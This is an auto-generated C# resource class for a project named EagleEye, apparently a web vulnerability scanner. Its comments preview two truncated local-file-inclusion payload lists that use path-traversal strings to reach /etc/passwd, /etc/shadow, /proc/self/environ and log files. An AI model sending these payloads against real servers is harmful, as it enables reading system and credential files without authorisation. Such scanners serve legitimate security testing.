//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace EagleEye.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("EagleEye.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to /etc/passwd
        ///../etc/passwd
        ///../../etc/passwd
        ///../../../etc/passwd
        ///../../../../etc/passwd
        ///../../../../../etc/passwd
        ///../../../../../../etc/passwd
        ///../../../../../../../etc/passwd
        ///../../../../../../../../etc/passwd
        ///../../../../../../../../../etc/passwd
        ///../../../../../../../../../../etc/passwd
        ///../../../../../../../../../../../etc/passwd
        ///../../../../../../../../../../../../etc/passwd
        ///../../../../../../../../../../../../../etc/passwd
        ///../../../../../../../../../../../../../../etc/passwd
        ///../../../../../. [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string lfi_huge {
            get {
                return ResourceManager.GetString("lfi_huge", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to /etc/passwd
        ///../logs/access_log
        ///../logs/error_log
        ////etc/shadow
        ////etc/group
        ///proc/self/environ
        ////proc/self/environ
        ////proc/self/cmdline
        ////proc/self/stat
        ////proc/self/status
        ////proc/self/fd/0
        ////proc/self/fd/1
        ////proc/self/fd/2
        ////proc/self/fd/3
        ////proc/self/fd/4
        ////proc/self/fd/5
        ////proc/self/fd/6
        ////proc/self/fd/7
        ////proc/self/fd/8
        ////proc/self/fd/9
        ////proc/self/fd/10
        ////proc/self/fd/11
        ////proc/self/fd/12
        ////proc/self/fd/13
        ////proc/self/fd/14
        ////proc/self/fd/15
        ////proc/self/fd/16
        ////proc/self/fd/17
        ////proc/self/fd/18
        ////proc/se [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string lfi_small {
            get {
                return ResourceManager.GetString("lfi_small", resourceCulture);
            }
        }
    }
}
